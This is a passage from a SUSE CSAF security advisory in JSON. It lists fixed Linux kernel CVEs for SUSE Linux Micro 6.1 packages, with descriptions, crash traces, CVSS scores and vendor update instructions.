"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40346",
"url": "https://www.suse.com/security/cve/CVE-2025-40346"
},
{
"category": "external",
"summary": "SUSE Bug 1255318 for CVE-2025-40346",
"url": "https://bugzilla.suse.com/1255318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40346"
},
{
"cve": "CVE-2025-40347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: enetc: fix the deadlock of enetc_mdio_lock\n\nAfter applying the workaround for err050089, the LS1028A platform\nexperiences RCU stalls on RT kernel. This issue is caused by the\nrecursive acquisition of the read lock enetc_mdio_lock. Here list some\nof the call stacks identified under the enetc_poll path that may lead to\na deadlock:\n\nenetc_poll\n -\u003e enetc_lock_mdio\n -\u003e enetc_clean_rx_ring OR napi_complete_done\n -\u003e napi_gro_receive\n -\u003e enetc_start_xmit\n -\u003e enetc_lock_mdio\n -\u003e enetc_map_tx_buffs\n -\u003e enetc_unlock_mdio\n -\u003e enetc_unlock_mdio\n\nAfter enetc_poll acquires the read lock, a higher-priority writer attempts\nto acquire the lock, causing preemption. The writer detects that a\nread lock is already held and is scheduled out. However, readers under\nenetc_poll cannot acquire the read lock again because a writer is already\nwaiting, leading to a thread hang.\n\nCurrently, the deadlock is avoided by adjusting enetc_lock_mdio to prevent\nrecursive lock acquisition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40347",
"url": "https://www.suse.com/security/cve/CVE-2025-40347"
},
{
"category": "external",
"summary": "SUSE Bug 1255262 for CVE-2025-40347",
"url": "https://bugzilla.suse.com/1255262"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40347"
},
{
"cve": "CVE-2025-40349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: validate record offset in hfsplus_bmap_alloc\n\nhfsplus_bmap_alloc can trigger a crash if a\nrecord offset or length is larger than node_size\n\n[ 15.264282] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.265192] Read of size 8 at addr ffff8881085ca188 by task test/183\n[ 15.265949]\n[ 15.266163] CPU: 0 UID: 0 PID: 183 Comm: test Not tainted 6.17.0-rc2-gc17b750b3ad9 #14 PREEMPT(voluntary)\n[ 15.266165] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 15.266167] Call Trace:\n[ 15.266168] \u003cTASK\u003e\n[ 15.266169] dump_stack_lvl+0x53/0x70\n[ 15.266173] print_report+0xd0/0x660\n[ 15.266181] kasan_report+0xce/0x100\n[ 15.266185] hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.266208] hfs_btree_inc_height.isra.0+0xd5/0x7c0\n[ 15.266217] hfsplus_brec_insert+0x870/0xb00\n[ 15.266222] __hfsplus_ext_write_extent+0x428/0x570\n[ 15.266225] __hfsplus_ext_cache_extent+0x5e/0x910\n[ 15.266227] hfsplus_ext_read_extent+0x1b2/0x200\n[ 15.266233] hfsplus_file_extend+0x5a7/0x1000\n[ 15.266237] hfsplus_get_block+0x12b/0x8c0\n[ 15.266238] __block_write_begin_int+0x36b/0x12c0\n[ 15.266251] block_write_begin+0x77/0x110\n[ 15.266252] cont_write_begin+0x428/0x720\n[ 15.266259] hfsplus_write_begin+0x51/0x100\n[ 15.266262] cont_write_begin+0x272/0x720\n[ 15.266270] hfsplus_write_begin+0x51/0x100\n[ 15.266274] generic_perform_write+0x321/0x750\n[ 15.266285] generic_file_write_iter+0xc3/0x310\n[ 15.266289] __kernel_write_iter+0x2fd/0x800\n[ 15.266296] dump_user_range+0x2ea/0x910\n[ 15.266301] elf_core_dump+0x2a94/0x2ed0\n[ 15.266320] vfs_coredump+0x1d85/0x45e0\n[ 15.266349] get_signal+0x12e3/0x1990\n[ 15.266357] arch_do_signal_or_restart+0x89/0x580\n[ 15.266362] irqentry_exit_to_user_mode+0xab/0x110\n[ 15.266364] asm_exc_page_fault+0x26/0x30\n[ 15.266366] RIP: 0033:0x41bd35\n[ 15.266367] Code: bc d1 f3 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 f3 0f 7f 7f 30 49 83 c0 0f 49 29 d0 48 8d 7c 17 31 e9 9f 0b 00 00 66 0f ef c0 \u003cf3\u003e 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 49 83 f8f\n[ 15.266369] RSP: 002b:00007ffc9e62d078 EFLAGS: 00010283\n[ 15.266371] RAX: 00007ffc9e62d100 RBX: 0000000000000000 RCX: 0000000000000000\n[ 15.266372] RDX: 00000000000000e0 RSI: 0000000000000000 RDI: 00007ffc9e62d100\n[ 15.266373] RBP: 0000400000000040 R08: 00000000000000e0 R09: 0000000000000000\n[ 15.266374] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n[ 15.266375] R13: 0000000000000000 R14: 0000000000000000 R15: 0000400000000000\n[ 15.266376] \u003c/TASK\u003e\n\nWhen calling hfsplus_bmap_alloc to allocate a free node, this function\nfirst retrieves the bitmap from header node and map node using node-\u003epage\ntogether with the offset and length from hfs_brec_lenoff\n\n```\nlen = hfs_brec_lenoff(node, 2, \u0026off16);\noff = off16;\n\noff += node-\u003epage_offset;\npagep = node-\u003epage + (off \u003e\u003e PAGE_SHIFT);\ndata = kmap_local_page(*pagep);\n```\n\nHowever, if the retrieved offset or length is invalid(i.e. exceeds\nnode_size), the code may end up accessing pages outside the allocated\nrange for this node.\n\nThis patch adds proper validation of both offset and length before use,\npreventing out-of-bounds page access. Move is_bnode_offset_valid and\ncheck_and_correct_requested_length to hfsplus_fs.h, as they may be\nrequired by other functions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40349",
"url": "https://www.suse.com/security/cve/CVE-2025-40349"
},
{
"category": "external",
"summary": "SUSE Bug 1255280 for CVE-2025-40349",
"url": "https://bugzilla.suse.com/1255280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40349"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in hfsplus_delete_cat()\n\nThe syzbot reported issue in hfsplus_delete_cat():\n\n[ 70.682285][ T9333] =====================================================\n[ 70.682943][ T9333] BUG: KMSAN: uninit-value in hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.683640][ T9333] hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.684141][ T9333] hfsplus_delete_cat+0x105d/0x12b0\n[ 70.684621][ T9333] hfsplus_rmdir+0x13d/0x310\n[ 70.685048][ T9333] vfs_rmdir+0x5ba/0x810\n[ 70.685447][ T9333] do_rmdir+0x964/0xea0\n[ 70.685833][ T9333] __x64_sys_rmdir+0x71/0xb0\n[ 70.686260][ T9333] x64_sys_call+0xcd8/0x3cf0\n[ 70.686695][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.687119][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.687646][ T9333]\n[ 70.687856][ T9333] Uninit was stored to memory at:\n[ 70.688311][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.688779][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.689231][ T9333] hfsplus_mknod+0x27f/0x600\n[ 70.689730][ T9333] hfsplus_mkdir+0x5a/0x70\n[ 70.690146][ T9333] vfs_mkdir+0x483/0x7a0\n[ 70.690545][ T9333] do_mkdirat+0x3f2/0xd30\n[ 70.690944][ T9333] __x64_sys_mkdir+0x9a/0xf0\n[ 70.691380][ T9333] x64_sys_call+0x2f89/0x3cf0\n[ 70.691816][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.692229][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.692773][ T9333]\n[ 70.692990][ T9333] Uninit was stored to memory at:\n[ 70.693469][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.693960][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.694438][ T9333] hfsplus_fill_super+0x21c1/0x2700\n[ 70.694911][ T9333] mount_bdev+0x37b/0x530\n[ 70.695320][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.695729][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.696167][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.696588][ T9333] do_new_mount+0x73e/0x1630\n[ 70.697013][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.697425][ T9333] __se_sys_mount+0x733/0x830\n[ 70.697857][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.698269][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.698704][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.699117][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.699730][ T9333]\n[ 70.699946][ T9333] Uninit was created at:\n[ 70.700378][ T9333] __alloc_pages_noprof+0x714/0xe60\n[ 70.700843][ T9333] alloc_pages_mpol_noprof+0x2a2/0x9b0\n[ 70.701331][ T9333] alloc_pages_noprof+0xf8/0x1f0\n[ 